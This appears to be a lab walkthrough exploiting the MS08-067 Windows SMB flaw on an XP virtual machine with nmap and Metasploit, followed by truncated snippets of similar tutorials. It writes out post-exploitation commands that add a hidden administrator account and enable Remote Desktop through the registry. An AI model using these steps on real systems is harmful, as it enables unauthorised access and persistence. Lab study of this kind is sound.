tags: Safety windows cyber security
#windowsxpsp3 system MS08-067 vulnerability test
Vulnerability description
The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability". If a user receives a specially crafted RPC request on the affected system, the vulnerability may allow remote code execution. In Windows 2000, Windows server 2003 On the system, an attacker may use this vulnerability to run arbitrary code without authentication. This vulnerability can be used to carry out worm attacks. There are worms that exploit this vulnerability.
Windows 2000、WindowsXP、Windows server 2003、Windows Vista、Windows server 2008、Windows7 beta。
Experimental environment (virtual machine construction)
Target host: winxpsp3 English version: 192.168.28.133
Attacking host: kaililinux: 192.168.28.134
Attack process
First use nmap to scan the internal 192.168.28.0/24-bit network segment to see if there is a host of the xp system alive



Enter the metasploit framework
Msfconsole
Search for vulnerabilities
Search ms08-067 Choose an attack module
View configuration information and set

Set the target host ip to be attacked

Set your own ip address for the target machine to reverse shell

Set the payload for reverse shell, here is windows

Start attack
Expolit/run

Some commands

Post-penetration
Getuid

Shell

net user ouyang 123456 /add

net localgroup administrators ouyang /add

After creating the user, open the 3389 remote desktop connection port
echo reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

Check if the machine is turned on 3389

remote Desktop connection

Link successfully

Delete user after getting information

This vulnerability of ms08-067 is one of the most basic vulnerabilities when we are learning msf. Many tutorials will mention this vulnerability, but this vulnerability is very picky about the reprodu...
lab environment kali linux2.0 win-xp sp3 Steps 1. Execute in the Kali Linux command line 2. Query MS08067 Vulnerability 3. Using Exploit / Windows / SMB / MS08_067_Netapi and view Options 4. Using Pay...
1 Start Metasploit 2 Find Metasploit module information 3 Set the module and module options 3.1 Setting up the module 3.2 Set module options 3.2.1 Set the target address and target port number 3.2.2 T...
Metasploit penetration test four | MS08-067 exploit Problem overview Implementation process Problem overview Exploit the MS08-067 vulnerability to obtain remote access permission of the target node an...
ms08-067 introduction The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: Windows 2000/XP/Server 2003/Vista/Server 2008 versions, and even Windows 7 ...
MS08-067 Remote Overflow Vulnerability Brief description of the vulnerability principle The attacker uses the default open SMB service port 445 of the victim host to send a special RPC (Remote ...
1. Find ms08-067: 2. Use: 3. Select the payload: (At the beginning, there is a difference between windows / shell / ... and windows / meterpreter / reverse_tpc) 4. View options (yes is required): 5. E...
0x01 experimental environment Attack machine: kali linux ip:10.10.10.131 Target machine: windows server 2003 ip:10.10.10.130 0x02 configure exploit msf > use exploit/windows/smb/ms08_067_netapi&nbs...
Put the previous experiments and written in the note in the cloud, put it on the CSDN First, an experimental environment Target: Windows XP SP3 Professional (Close Windows self-contained firewall!!!) ...
MS08-067 Vulnerability: It is a vulnerability in a remote process call (RPC) service. When calling the NetPathCanonicalize function in the SMB channel, the vulnerability is triggered, causing the use ...